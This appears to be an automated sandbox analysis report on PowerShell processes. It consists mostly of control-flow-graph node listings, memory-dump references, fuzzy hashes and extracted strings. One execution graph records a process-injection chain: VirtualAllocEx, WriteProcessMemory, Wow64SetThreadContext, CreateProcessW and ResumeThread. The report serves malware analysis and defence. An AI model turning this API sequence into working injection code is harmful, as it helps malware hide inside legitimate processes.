                                                                                                control_flow_graph 693 6e71f3f-6e71f65 695 6e71f6b-6e71f70 693->695 696 6e72158-6e72162 693->696 697 6e71f72-6e71f78 695->697 698 6e71f88-6e71f8c 695->698 700 6e71f7c-6e71f86 697->700 701 6e71f7a 697->701 702 6e71f92-6e71f94 698->702 703 6e72108-6e72112 698->703 700->698 701->698 706 6e71f96-6e71fa2 702->706 707 6e71fa4 702->707 704 6e72114-6e7211d 703->704 705 6e72120-6e72126 703->705 708 6e7212c-6e72138 705->708 709 6e72128-6e7212a 705->709 711 6e71fa6-6e71fa8 706->711 707->711 712 6e7213a-6e72155 708->712 709->712 711->703 713 6e71fae-6e71fcd 711->713 719 6e71fcf-6e71fdb 713->719 720 6e71fdd 713->720 721 6e71fdf-6e71fe1 719->721 720->721 721->703 722 6e71fe7-6e71fee 721->722 722->696 723 6e71ff4-6e71ff9 722->723 724 6e72011-6e72020 723->724 725 6e71ffb-6e72001 723->725 724->703 730 6e72026-6e72044 724->730 726 6e72005-6e7200f 725->726 727 6e72003 725->727 726->724 727->724 730->703 733 6e7204a-6e7206f 730->733 733->703 736 6e72075-6e7207c 733->736 737 6e720c2-6e720f5 736->737 738 6e7207e-6e72099 736->738 748 6e720fc-6e72105 737->748 741 6e720b3-6e720b7 738->741 742 6e7209b-6e720a1 738->742 746 6e720be-6e720c0 741->746 744 6e720a5-6e720b1 742->744 745 6e720a3 742->745 744->741 745->741 746->748
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 853abcff3fae9c3453954d051ce0c04a96657ca961884fb310e56c184e8f9f8c
                                                                                                • Instruction ID: 848eb14ae617556ccdf31c2af80ebcfeadfc72afa364fda38e0d0897e7b18312
                                                                                                • Opcode Fuzzy Hash: 853abcff3fae9c3453954d051ce0c04a96657ca961884fb310e56c184e8f9f8c
                                                                                                • Instruction Fuzzy Hash: 9F31B570E00305CFDBB4CF158D11AADBBA2BF84318F6990A5DA049F255DB32DA85CBB1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 806 6e71f27-6e71f34 807 6e71f36-6e71f3e 806->807 808 6e71f71-6e71f78 806->808 809 6e71f7c-6e71f86 808->809 810 6e71f7a 808->810 811 6e71f88-6e71f8c 809->811 810->811 813 6e71f92-6e71f94 811->813 814 6e72108-6e72112 811->814 817 6e71f96-6e71fa2 813->817 818 6e71fa4 813->818 815 6e72114-6e7211d 814->815 816 6e72120-6e72126 814->816 819 6e7212c-6e72138 816->819 820 6e72128-6e7212a 816->820 821 6e71fa6-6e71fa8 817->821 818->821 822 6e7213a-6e72155 819->822 820->822 821->814 823 6e71fae-6e71fcd 821->823 829 6e71fcf-6e71fdb 823->829 830 6e71fdd 823->830 831 6e71fdf-6e71fe1 829->831 830->831 831->814 832 6e71fe7-6e71fee 831->832 833 6e71ff4-6e71ff9 832->833 834 6e72158-6e72162 832->834 835 6e72011-6e72020 833->835 836 6e71ffb-6e72001 833->836 835->814 842 6e72026-6e72044 835->842 838 6e72005-6e7200f 836->838 839 6e72003 836->839 838->835 839->835 842->814 845 6e7204a-6e7206f 842->845 845->814 848 6e72075-6e7207c 845->848 849 6e720c2-6e720f5 848->849 850 6e7207e-6e72099 848->850 860 6e720fc-6e72105 849->860 853 6e720b3-6e720b7 850->853 854 6e7209b-6e720a1 850->854 858 6e720be-6e720c0 853->858 856 6e720a5-6e720b1 854->856 857 6e720a3 854->857 856->853 857->853 858->860
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 25431c4717f8433f13264fa377e429a3b84451850a6e8b3c92d93a090825d9bb
                                                                                                • Instruction ID: b057014618f802f3081b5ae04ab66e9e9cc1c07c07cd13a3b4d23c6f9fa9587f
                                                                                                • Opcode Fuzzy Hash: 25431c4717f8433f13264fa377e429a3b84451850a6e8b3c92d93a090825d9bb
                                                                                                • Instruction Fuzzy Hash: A631F570F44301CFDBB48E148C11AB97B62BF90319FA9A095D6018F296DB32CA85CBB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f2cb03f1588c382c307063f858dcecd4683cb85d3f19d772c953aa55bb4f47b
                                                                                                • Instruction ID: 466be8c72be3563c4ec0c37e4ba44fefd80ed3e9162882b81eeb43f81b140b3f
                                                                                                • Opcode Fuzzy Hash: 8f2cb03f1588c382c307063f858dcecd4683cb85d3f19d772c953aa55bb4f47b
                                                                                                • Instruction Fuzzy Hash: CB1136B07003146BD76096A99820B7AB786AFC4B24F60C42AF509CF380DD72DE8183A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c0abb30ce0a8d15d665aa7e1c996fd25615730256d84a8be21ef6a7c3061739
                                                                                                • Instruction ID: 35260b3ee8f19998eb371005b09b167fc4d552754bb172c731a749eb85b0fef0
                                                                                                • Opcode Fuzzy Hash: 1c0abb30ce0a8d15d665aa7e1c996fd25615730256d84a8be21ef6a7c3061739
                                                                                                • Instruction Fuzzy Hash: 0D118E307083802FD75246798C21B6A6FA39FD2714F59C457E448DF3E2C4699D85C375
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1773811083.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_65d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3728ee6194e1489d596a6b72038225c908c2cea0a1f311c3b733151e5bc1ba05
                                                                                                • Instruction ID: 47a01fc0480d388c2a0995872501e6a16e83b85a75c2044b2a3781d435bca93f
                                                                                                • Opcode Fuzzy Hash: 3728ee6194e1489d596a6b72038225c908c2cea0a1f311c3b733151e5bc1ba05
                                                                                                • Instruction Fuzzy Hash: 44011B6140D3C05FD7128A258D94692BFA4EF53225F1985DBE8888F2D7C2695C49C772
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1773811083.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_65d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74366c0d89b748c93db21bd8942b940a43ace280ba6001162ea01f651ff932cd
                                                                                                • Instruction ID: eab889469777b42322374b9f78c00cc12d9142ac2d8ace3b7c23aff0ee9b6317
                                                                                                • Opcode Fuzzy Hash: 74366c0d89b748c93db21bd8942b940a43ace280ba6001162ea01f651ff932cd
                                                                                                • Instruction Fuzzy Hash: 1001DB714093409AE7304E26CDC4BA7BF99DF51325F18C569ED484B3C6C679DC8AC6B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-578306960
                                                                                                • Opcode ID: 2a4a0bf96777826b5831d8b63c8ca4c04ece2f4025bd62b231afdb70c99d1b65
                                                                                                • Instruction ID: 8cbf68d45f7260778c9c93639eaf7a43f08ab19b9a43d3b4b0e8d08faac8a399
                                                                                                • Opcode Fuzzy Hash: 2a4a0bf96777826b5831d8b63c8ca4c04ece2f4025bd62b231afdb70c99d1b65
                                                                                                • Instruction Fuzzy Hash: A5313A32B143158FD7688E69D404AAABBE9AFD4B24B2C846EE505CF351DA32DD44C790
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-578306960
                                                                                                • Opcode ID: 1323e2e8252571ee6c94ca78707b7942174ef80614da4586c6ad78178a36d31a
                                                                                                • Instruction ID: 41192518a88665ee530bae59624c39443099b4eb360e0314a3b01fdcf967f8f8
                                                                                                • Opcode Fuzzy Hash: 1323e2e8252571ee6c94ca78707b7942174ef80614da4586c6ad78178a36d31a
                                                                                                • Instruction Fuzzy Hash: 13313A72B143148FE7588A69D804A6BBBE5FFC4725F24846EE905CF355CA32DD44C3A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2125118731
                                                                                                • Opcode ID: eba2f8b4d8574b985b3d2ed25a49993b0b30369eb6a56de7b985871817d1ddb7
                                                                                                • Instruction ID: aae667657d60d5d551972fff41b4e09a14ad9760e6330030a4762fca4a611ba1
                                                                                                • Opcode Fuzzy Hash: eba2f8b4d8574b985b3d2ed25a49993b0b30369eb6a56de7b985871817d1ddb7
                                                                                                • Instruction Fuzzy Hash: AA216B31B103195BEBF485AAAC00B67A7DA9BC4B18F24942AE405CF3C5DD32C945D361
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1778034513.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6e70000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                • API String ID: 0-2049395529
                                                                                                • Opcode ID: e628fe7a56761f9b59249176e770e4f709721be3491294b5781060a2ef67b057
                                                                                                • Instruction ID: b793190dc625059a17f8cd799ad1a7476c8e3b455e5ecf48863b03c75cab6d3b
                                                                                                • Opcode Fuzzy Hash: e628fe7a56761f9b59249176e770e4f709721be3491294b5781060a2ef67b057
                                                                                                • Instruction Fuzzy Hash: 5401A251B4E3850FC36B1A781C304666FB61FC356072A49DBC081DF3ABCD558D4A83A2

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:25
                                                                                                Total number of Limit Nodes:6
                                                                                                execution_graph 9573 2fb9408 9574 2fb9458 WriteProcessMemory 9573->9574 9575 2fb9450 9573->9575 9576 2fb9493 9574->9576 9575->9574 9577 2fb840f 9579 2fb8417 9577->9579 9580 2fb833a 9579->9580 9581 2fb83d3 9580->9581 9584 2fb891d 9580->9584 9582 2fb8443 9588 2fb892f 9584->9588 9585 2fb8944 9585->9582 9586 2fb8eb3 9587 2fb9135 CreateProcessW 9586->9587 9589 2fb8ec9 9586->9589 9590 2fb91a9 9587->9590 9588->9585 9588->9586 9591 2fb8bd1 VirtualAllocEx 9588->9591 9589->9582 9592 2fb8c1e 9591->9592 9593 2fb8c49 VirtualAllocEx 9592->9593 9594 2fb8c9d 9592->9594 9593->9594 9594->9586 9595 2fb8e73 ResumeThread 9594->9595 9595->9586 9596 2fb9340 9597 2fb92c6 Wow64SetThreadContext 9596->9597 9600 2fb9346 9596->9600 9599 2fb930a 9597->9599

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 76e0978-76e099b 1 76e0b76-76e0bbb 0->1 2 76e09a1-76e09a6 0->2 12 76e0d12-76e0d5e 1->12 13 76e0bc1-76e0bc6 1->13 3 76e09be-76e09c2 2->3 4 76e09a8-76e09ae 2->4 5 76e09c8-76e09cc 3->5 6 76e0b23-76e0b2d 3->6 8 76e09b2-76e09bc 4->8 9 76e09b0 4->9 10 76e09ce-76e09dd 5->10 11 76e09df 5->11 14 76e0b2f-76e0b38 6->14 15 76e0b3b-76e0b41 6->15 8->3 9->3 19 76e09e1-76e09e3 10->19 11->19 32 76e0ecb-76e0efd 12->32 33 76e0d64-76e0d69 12->33 20 76e0bde-76e0be2 13->20 21 76e0bc8-76e0bce 13->21 17 76e0b47-76e0b53 15->17 18 76e0b43-76e0b45 15->18 22 76e0b55-76e0b73 17->22 18->22 19->6 25 76e09e9-76e0a09 19->25 23 76e0cbf-76e0cc9 20->23 24 76e0be8-76e0bea 20->24 27 76e0bd2-76e0bdc 21->27 28 76e0bd0 21->28 34 76e0ccb-76e0cd4 23->34 35 76e0cd7-76e0cdd 23->35 30 76e0bec-76e0bf8 24->30 31 76e0bfa 24->31 67 76e0a0b-76e0a26 25->67 68 76e0a28 25->68 27->20 28->20 37 76e0bfc-76e0bfe 30->37 31->37 63 76e0eff-76e0f0b 32->63 64 76e0f0d 32->64 39 76e0d6b-76e0d71 33->39 40 76e0d81-76e0d85 33->40 42 76e0cdf-76e0ce1 35->42 43 76e0ce3-76e0cef 35->43 37->23 45 76e0c04-76e0c08 37->45 46 76e0d75-76e0d7f 39->46 47 76e0d73 39->47 48 76e0e7a-76e0e84 40->48 49 76e0d8b-76e0d8d 40->49 50 76e0cf1-76e0d0f 42->50 43->50 55 76e0c0a-76e0c26 45->55 56 76e0c28 45->56 46->40 47->40 53 76e0e86-76e0e8f 48->53 54 76e0e92-76e0e98 48->54 59 76e0d8f-76e0d9b 49->59 60 76e0d9d 49->60 65 76e0e9e-76e0eaa 54->65 66 76e0e9a-76e0e9c 54->66 70 76e0c2a-76e0c2c 55->70 56->70 61 76e0d9f-76e0da1 59->61 60->61 61->48 76 76e0da7-76e0da9 61->76 73 76e0f0f-76e0f11 63->73 64->73 74 76e0eac-76e0ec8 65->74 66->74 72 76e0a2a-76e0a2c 67->72 68->72 70->23 71 76e0c32-76e0c45 70->71 103 76e0c4b-76e0c4d 71->103 72->6 77 76e0a32-76e0a34 72->77 79 76e0f5d-76e0f67 73->79 80 76e0f13-76e0f19 73->80 83 76e0dab-76e0db7 76->83 84 76e0db9 76->84 87 76e0a36-76e0a42 77->87 88 76e0a44 77->88 89 76e0f69-76e0f6f 79->89 90 76e0f72-76e0f78 79->90 92 76e0f1b-76e0f1d 80->92 93 76e0f27-76e0f44 80->93 91 76e0dbb-76e0dbd 83->91 84->91 96 76e0a46-76e0a48 87->96 88->96 97 76e0f7e-76e0f8a 90->97 98 76e0f7a-76e0f7c 90->98 91->48 95 76e0dc3-76e0dc5 91->95 92->93 107 76e0faa-76e0faf 93->107 108 76e0f46-76e0f57 93->108 100 76e0ddf-76e0de3 95->100 101 76e0dc7-76e0dcd 95->101 96->6 104 76e0a4e-76e0a6e 96->104 105 76e0f8c-76e0fa7 97->105 98->105 111 76e0dfd-76e0e77 100->111 112 76e0de5-76e0deb 100->112 109 76e0dcf 101->109 110 76e0dd1-76e0ddd 101->110 113 76e0c4f-76e0c55 103->113 114 76e0c65-76e0cbc 103->114 130 76e0a86-76e0a8a 104->130 131 76e0a70-76e0a76 104->131 107->108 108->79 109->100 110->100 116 76e0def-76e0dfb 112->116 117 76e0ded 112->117 118 76e0c59-76e0c5b 113->118 119 76e0c57 113->119 116->111 117->111 118->114 119->114 132 76e0a8c-76e0a92 130->132 133 76e0aa4-76e0aa8 130->133 135 76e0a7a-76e0a7c 131->135 136 76e0a78 131->136 137 76e0a96-76e0aa2 132->137 138 76e0a94 132->138 139 76e0aaf-76e0ab1 133->139 135->130 136->130 137->133 138->133 141 76e0ac9-76e0b20 139->141 142 76e0ab3-76e0ab9 139->142 143 76e0abd-76e0abf 142->143 144 76e0abb 142->144 143->141 144->141
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2118039658
                                                                                                • Opcode ID: abd28024c1661ae7728c8727d5309cbb605db41b1b251f45e6b3ee771f39da21
                                                                                                • Instruction ID: 16d51847f8dd52042bc04693082520c029d62220b005cdc8975c94b83b4213f8
                                                                                                • Opcode Fuzzy Hash: abd28024c1661ae7728c8727d5309cbb605db41b1b251f45e6b3ee771f39da21
                                                                                                • Instruction Fuzzy Hash: 77F16DB1B0130A8FDB249E39980076ABBE9AFC5710F34847AD446CB345DE72C885CB71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-1590887
                                                                                                • Opcode ID: 5219017541928a9199e097a2ada89e201d7bcab7e76e91fa70e8404a76d14599
                                                                                                • Instruction ID: 0940ee1874e8953be13a86549a0350023f5dc36458db9ec36490520012811d4b
                                                                                                • Opcode Fuzzy Hash: 5219017541928a9199e097a2ada89e201d7bcab7e76e91fa70e8404a76d14599
                                                                                                • Instruction Fuzzy Hash: D02229B1B0570ACFCB258F74C8646AABBAFBF85310F14846AD5468B351DB31C946CB71

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 336 2fb891d-2fb892a 337 2fb892f-2fb8942 call 2fb891d 336->337 339 2fb894e-2fb8951 337->339 340 2fb8944-2fb894d 337->340 341 2fb895f-2fb8a29 339->341 342 2fb8953-2fb8956 339->342 348 2fb8a2f-2fb8a34 341->348 349 2fb9034-2fb90c9 341->349 342->337 343 2fb8958-2fb895e 342->343 350 2fb8a42 348->350 351 2fb8a36-2fb8a40 348->351 362 2fb90cb-2fb90ce 349->362 363 2fb90d1-2fb90d8 349->363 352 2fb8a47-2fb8a49 350->352 351->352 354 2fb8a4b-2fb8a5d 352->354 355 2fb8a63-2fb8a86 call 2fb7500 352->355 354->355 364 2fb8fbd-2fb8fd0 355->364 365 2fb8a8c-2fb8aa1 355->365 362->363 366 2fb90da-2fb90e0 363->366 367 2fb90e3-2fb90f9 363->367 380 2fb8fd7-2fb8fed 364->380 372 2fb8ece 365->372 373 2fb8aa7-2fb8acb 365->373 366->367 369 2fb90fb-2fb9101 367->369 370 2fb9104-2fb91a7 CreateProcessW 367->370 369->370 377 2fb91a9-2fb91af 370->377 378 2fb91b0-2fb9228 370->378 379 2fb8ed3-2fb8ee6 372->379 373->380 385 2fb8ad1-2fb8ae4 call 2fb750c 373->385 377->378 409 2fb923a-2fb9241 378->409 410 2fb922a-2fb9230 378->410 392 2fb8eed-2fb8f00 379->392 380->349 396 2fb8fef-2fb8ff7 380->396 393 2fb8aea-2fb8af4 385->393 394 2fb8fa3-2fb8fb6 385->394 418 2fb8f07-2fb8f1a 392->418 393->380 397 2fb8afa-2fb8b17 393->397 394->364 403 2fb8ff9-2fb8ffb call 2fb7970 396->403 404 2fb9000-2fb900d 396->404 397->372 399 2fb8b1d-2fb8b37 call 2fb7518 397->399 416 2fb8f89-2fb8f9c 399->416 417 2fb8b3d-2fb8b46 399->417 403->404 426 2fb9014-2fb9031 404->426 414 2fb9258 409->414 415 2fb9243-2fb9252 409->415 410->409 425 2fb9259 414->425 415->414 416->394 419 2fb8b48-2fb8b8c 417->419 420 2fb8ba7-2fb8bad 417->420 439 2fb8f21-2fb8f34 418->439 431 2fb8b8e-2fb8b94 419->431 432 2fb8b95-2fb8ba1 419->432 420->372 421 2fb8bb3-2fb8bc3 420->421 421->372 434 2fb8bc9-2fb8c1c VirtualAllocEx 421->434 425->425 431->432 432->420 433 2fb8f6f-2fb8f82 432->433 433->416 440 2fb8c1e-2fb8c24 434->440 441 2fb8c25-2fb8c47 434->441 456 2fb8f3b-2fb8f4e 439->456 440->441 444 2fb8c49-2fb8c9b VirtualAllocEx 441->444 445 2fb8cb4-2fb8cbb 441->445 449 2fb8c9d-2fb8ca3 444->449 450 2fb8ca4-2fb8cae 444->450 446 2fb8cc1-2fb8cdc call 2fb7524 445->446 447 2fb8f55-2fb8f68 445->447 446->456 457 2fb8ce2-2fb8ceb 446->457 447->433 449->450 450->445 456->447 457->372 458 2fb8cf1-2fb8cf7 457->458 458->372 461 2fb8cfd-2fb8d08 458->461 461->372 464 2fb8d0e-2fb8d18 461->464 465 2fb8de8-2fb8df9 464->465 466 2fb8d1e-2fb8d23 464->466 465->372 470 2fb8dff-2fb8e13 call 2fb7524 465->470 466->372 467 2fb8d29-2fb8d3c 466->467 467->372 471 2fb8d42-2fb8d51 467->471 470->418 475 2fb8e19-2fb8e1f 470->475 471->372 476 2fb8d57-2fb8d67 471->476 475->372 477 2fb8e25-2fb8e36 475->477 480 2fb8dca-2fb8dcd 476->480 481 2fb8d69-2fb8d6c 476->481 482 2fb8e38-2fb8e3b 477->482 483 2fb8e41-2fb8e49 477->483 480->372 485 2fb8dd3-2fb8dd6 480->485 481->372 486 2fb8d72-2fb8d75 481->486 482->483 483->372 484 2fb8e4f-2fb8e59 483->484 484->380 487 2fb8e5f-2fb8e71 call 2fb7530 484->487 485->372 488 2fb8ddc-2fb8de2 485->488 486->372 489 2fb8d7b-2fb8da9 486->489 487->392 493 2fb8e73-2fb8eb1 ResumeThread 487->493 488->465 488->466 489->372 498 2fb8daf-2fb8dbd call 2fb7524 489->498 494 2fb8eba-2fb8ec7 493->494 495 2fb8eb3-2fb8eb9 493->495 494->379 497 2fb8ec9-2fb900f 494->497 495->494 497->426 502 2fb8dc2-2fb8dc4 498->502 502->439 502->480
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1914736614.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2fb0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: lX
                                                                                                • API String ID: 0-2093460002
                                                                                                • Opcode ID: 560c0f91702cc60d18ccb63ea375110b4b089c83ded52c7f8a29e7a15a8c0ad9
                                                                                                • Instruction ID: f4c726073b440f3ae3c8a6bf05b9c4ad34a1c500a2b0e495d9bd6cdf0d0e5180
                                                                                                • Opcode Fuzzy Hash: 560c0f91702cc60d18ccb63ea375110b4b089c83ded52c7f8a29e7a15a8c0ad9
                                                                                                • Instruction Fuzzy Hash: AB32B071E002299FDB25DF65C854BDEBBB6BF84384F108199E60DAB290DB309D85CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 504 76e1428-76e1444 505 76e1479 504->505 506 76e1446-76e146e 504->506 509 76e147b-76e1481 505->509 510 76e1491-76e1495 505->510 507 76e161a-76e1634 506->507 508 76e1474-76e1477 506->508 508->505 511 76e1485-76e148f 509->511 512 76e1483 509->512 513 76e149b-76e149d 510->513 514 76e15c6-76e15d0 510->514 511->510 512->510 516 76e149f-76e14ab 513->516 517 76e14ad 513->517 518 76e15de-76e15e4 514->518 519 76e15d2-76e15db 514->519 522 76e14af-76e14b1 516->522 517->522 523 76e15ea-76e15f6 518->523 524 76e15e6-76e15e8 518->524 522->514 525 76e14b7-76e14bb 522->525 526 76e15f8-76e1617 523->526 524->526 528 76e14ce 525->528 529 76e14bd-76e14cc 525->529 530 76e14d0-76e14d2 528->530 529->530 530->514 532 76e14d8-76e14da 530->532 533 76e14dc-76e14e8 532->533 534 76e14ea 532->534 536 76e14ec-76e14ee 533->536 534->536 536->514 537 76e14f4-76e14f6 536->537 538 76e14f8-76e14fe 537->538 539 76e1510-76e151b 537->539 540 76e1502-76e150e 538->540 541 76e1500 538->541 542 76e151d-76e1520 539->542 543 76e152a-76e1536 539->543 540->539 541->539 542->543 544 76e1538-76e153a 543->544 545 76e1544-76e154b 543->545 544->545 547 76e1552-76e1554 545->547 548 76e156c-76e15c3 547->548 549 76e1556-76e155c 547->549 550 76e155e 549->550 551 76e1560-76e1562 549->551 550->548 551->548
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.1945920883.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_76e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: d790b2d21dd2caa852b21fad40783cd90b135603f17b059ef64cd29ec8140ed0
                                                                                                • Instruction ID: abae67f41a042291ecc2e8a662ef00f175dbb47a9a935e5a366ba5438eb6df3a
                                                                                                • Opcode Fuzzy Hash: d790b2d21dd2caa852b21fad40783cd90b135603f17b059ef64cd29ec8140ed0
                                                                                                • Instruction Fuzzy Hash: 2B511AF1A0534DCFC71D8E3998505AA7BE9AF83210B1884A7D817CF351DA31C949DBB1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 553 76e0958-76e099b 555 76e0b76-76e0bbb 553->555 556 76e09a1-76e09a6 553->556 566 76e0d12-76e0d5e 555->566 567 76e0bc1-76e0bc6 555->567 557 76e09be-76e09c2 556->557 558 76e09a8-76e09ae 556->558 559 76e09c8-76e09cc 557->559 560 76e0b23-76e0b2d 557->560 562 76e09b2-76e09bc 558->562 563 76e09b0 558->563 564 76e09ce-76e09dd 559->564 565 76e09df 559->565 568 76e0b2f-76e0b38 560->568 569 76e0b3b-76e0b41 560->569 562->557 563->557 573 76e09e1-76e09e3 564->573 565->573 586 76e0ecb-76e0efd 566->586 587 76e0d64-76e0d69 566->587 574 76e0bde-76e0be2 567->574 575 76e0bc8-76e0bce 567->575 571 76e0b47-76e0b53 569->571 572 76e0b43-76e0b45 569->572 576 76e0b55-76e0b73 571->576 572->576 573->560 579 76e09e9-76e0a09 573->579 577 76e0cbf-76e0cc9 574->577 578 76e0be8-76e0bea 574->578 581 76e0bd2-76e0bdc 575->581 582 76e0bd0 575->582 588 76e0ccb-76e0cd4 577->588 589 76e0cd7-76e0cdd 577->589 584 76e0bec-76e0bf8 578->584 585 76e0bfa 578->585 621 76e0a0b-76e0a26 579->621 622 76e0a28 579->622 581->574 582->574 591 76e0bfc-76e0bfe 584->591 585->591 617 76e0eff-76e0f0b 586->617 618 76e0f0d 586->618 593 76e0d6b-76e0d71 587->593 594 76e0d81-76e0d85 587->594 596 76e0cdf-76e0ce1 589->596 597 76e0ce3-76e0cef 589->597 591->577 599 76e0c04-76e0c08 591->599 600 76e0d75-76e0d7f 593->600 601 76e0d73 593->601 602 76e0e7a-76e0e84 594->602 603 76e0d8b-76e0d8d 594->603 604 76e0cf1-76e0d0f 596->604 597->604 609 76e0c0a-76e0c26 599->609 610 76e0c28 599->610 600->594 601->594 607 76e0e86-76e0e8f 602->607 608 76e0e92-76e0e98 602->608 613 76e0d8f-76e0d9b 603->613 614 76e0d9d 603->614 619 76e0e9e-76e0eaa 608->619 620 76e0e9a-76e0e9c 608->620 624 76e0c2a-76e0c2c 609->624 610->624 615 76e0d9f-76e0da1 613->615 614->615 615->602 630 76e0da7-76e0da9 615->630 627 76e0f0f-76e0f11 617->627 618->627 628 76e0eac-76e0ec8 619->628 620->628 626 76e0a2a-76e0a2c 621->626 622->626 624->577 625 76e0c32-76e0c35 624->625 640 76e0c3f-76e0c45 625->640 626->560 631 76e0a32-76e0a34 626->631 633 76e0f5d-76e0f67 627->633 634 76e0f13-76e0f19 627->634 637 76e0dab-76e0db7 630->637 638 76e0db9 